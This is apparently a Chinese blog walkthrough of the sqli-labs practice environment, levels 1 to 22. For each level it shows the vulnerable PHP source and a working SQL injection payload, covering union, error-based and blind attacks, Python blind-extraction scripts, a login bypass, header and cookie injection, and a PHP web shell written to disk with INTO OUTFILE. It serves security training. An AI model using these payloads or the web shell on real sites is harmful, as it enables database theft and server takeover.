sqli-labs速刷通关

前言

博主本质:日更(×) 日咕(✓)

目前记录到Less-22 :-)

Creeper?

Awww man.

Less-1

源码:

1
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

payload:

1
?id=-1' union select 1,2,database() --+

Less-2

源码:

1
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

payload:

1
?id=-1 union select 1,2,user() --+

Less-3

源码:

1
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

payload:

1
?id=-1') union select 1,2,user() --+

Less-4

源码:

1
2
$id = '"' . $id . '"';  // 加了双引号,单引号不被解析
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

payload:

1
?id=-1") union select 1,2,database() --+

Less-5

考察点:布尔盲注、报错注入

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........'; //不返回查询结果
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="3" color="#FFFF00">';
print_r(mysql_error()); //输出错误
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

payload1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# -- coding: utf-8 --
import requests
import string

s = requests.session()
character = "abcdefghijklmnopqrstuvwxyz"
length = 32
flag = ""

for i in range(1,length):
for c in character:
url = "http://127.0.0.1/sqli-labs/Less-5/?id=1' and ascii(substr((select database()),%d,1)) = %d --+" \
% (i, ord(c))
r = s.get(url).text
if "You are in" in r:
flag += c
print(flag)
break

payload2:

1
2
3
4
5
6
7
8

?id=1' and updatexml(1,concat('~',(your_payload),'~'),3) --+

?id=1' and extractvalue(1,concat(0x7e,(your_payload),0x7e)) --+

?id=1' and exp(~(select * from (your_payload) a) ); --+

?id=1' and (select 1 from (select count(*),concat(((your_payload)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

Less-6

单引号变为双引号,修改一下Less-5的payload即可。

Less-7

考察点:sql文件操作

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
echo '<br>'.$sql.'<br>';
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo '<font color= "#FFFF00">';
echo 'You are in.... Use outfile......';
echo "<br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
echo 'You have an error in your SQL syntax';
//print_r(mysql_error());
echo "</font>";
}

提示我们用outfile,我们可以写一个shell进去。

payload:

1
?id=1')) union select 1,2,'<script language='php'>@eval($_POST['sketch_pl4ne'])</script>' into outfile 'C:\\xxx\\xxx\\xxx\\output.php' --+  需要是绝对路径

蚁剑连接:

Less-8

考察点:布尔盲注

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="5" color="#FFFF00">';
//echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

PS:看代码要仔细,这里不输出错误信息,只能盲注。

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# -- coding: utf-8 --
import requests
import string

s = requests.session()
character = "abcdefghijklmnopqrstuvwxyz"
length = 32
flag = ""

for i in range(1,length):
for c in character:
url = "http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),%d,1)) = %d --+" \
% (i, ord(c))
r = s.get(url).text
if "You are in" in r:
flag += c
print(flag)
break

Less-9

考察点:时间盲注

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

这里都会输出You are in...........,也就是说根据返回页面无法判断语句是否执行成功。

所以这里我们用时间盲注。

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# -- coding: utf-8 --
import requests
import string

character = string.digits + string.ascii_letters + string.punctuation
flag_length = 40
flag = ""

s = requests.session()
for i in range(1, flag_length):
for c in character:
url = "http://127.0.0.1/sqli-labs/Less-9/?id=1' and if((ascii(substr((select database()),%d,1)))=%d,sleep(5),0) --+" % (i, ord(c))
try:
s.get(url, timeout=4)
except requests.exceptions.ReadTimeout:
flag += c
print(flag)

Less-10

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{

echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';

}

payload:

单引号改为双引号 ,payload参考上一题= =

Less-11

考察点:POST注入

目前来说与GET并没有太大区别,之后讲宽字节注入时会加以区分。

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];

// connectivity
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
//echo '<font color= "#0000ff">';

echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';

echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}

payload:

1
2
3
uname=admin' or 1 #
&passwd=everything
&submit=Submit

Less-12

源码:

1
2
3
4
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';

payload:

Less-11的传参添加双引号,参考上一题。

Less-13

考察点:布尔盲注

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
//echo '<font color= "#0000ff">';

echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
//echo "<br>";
//echo 'Your Password:' .$row['password'];
//echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';

echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}

发现没有回显,但是有图片成功或者失败的提示,考虑布尔盲注。

payload:

脚本编写参考Less-8,关键是找到有不同回显的地方,当然以及注入点。

Less-14

源码:

1
2
3
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

payload:

脚本编写参考Less-8。

Less-15

源码:

1
2
3
4
5
6
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];

// connectivity
// @$sql 不显示错误提示
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

payload:

换汤不换药,采用布尔盲注与时间盲注均可。

Less-16

源码:

1
2
3
4
5
6
7
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];

// connectivity
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

payload:

依然是换汤不换药,但也提醒我们要留意参数可能存在的情况:’$id’,”$id”,($id),(“$id”),(‘$id’),(($id))等等。

Less-17

考察点:update语句注入

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
//有点狠的过滤
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}

// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}

// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}

else
{
$value = intval($value);
}
return $value;
}


if(isset($_POST['uname']) && isset($_POST['passwd']))

{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);

$passwd=$_POST['passwd'];

// connectivity
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
//echo '<font color= "#0000ff">';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
......;
}

payload:

1
2
3
4
uname=sketch_pl4ne
&passwd=passwd'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
&submit=Submit
//其他报错注入语句自行尝试

Less-18

考察点:HTTP头部注入–UA

源码:

1
2
3
4
5
6
$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

echo 'Your User Agent is: ' .$uagent;

payload:

1
2
//抓包修改UA
' and updatexml(1,concat('~',(database()),'~'),3) and '1'='1

Less-19

考察点:HTTP头部注入–Referer

源码:

1
2
$uagent = $_SERVER['HTTP_REFERER'];
//其余同Less-18

payload:

1
2
//抓包改Referer
' and updatexml(1,concat('~',(database()),'~'),3) and '1'='1

Less-20

考察点:HTTP头部注入–Cookie

源码:

1
2
3
$cookee = $_COOKIE['uname'];
.......
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

payload:

1
2
//抓包改Cookie['uname']
admin1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) #

Less-21

考察点:HTTP头部注入–Cookie、base64编码

源码:

1
2
3
4
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
......
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

payload:

1
2
//抓包改Cookie['uname']
YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpKSM=

Less-22

源码:

1
2
3
4
5
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
.....
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

payload:

1
2
//抓包改Cookie['uname']
c2tldGNoX3BsNG5lImFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSM=

小结

英语作文还没写,wsl。。。

PPT还没写,wsl。。。

我感觉💊

虽然明天满课(还有两篇英语作文awsl),还是争取写出来八。

0%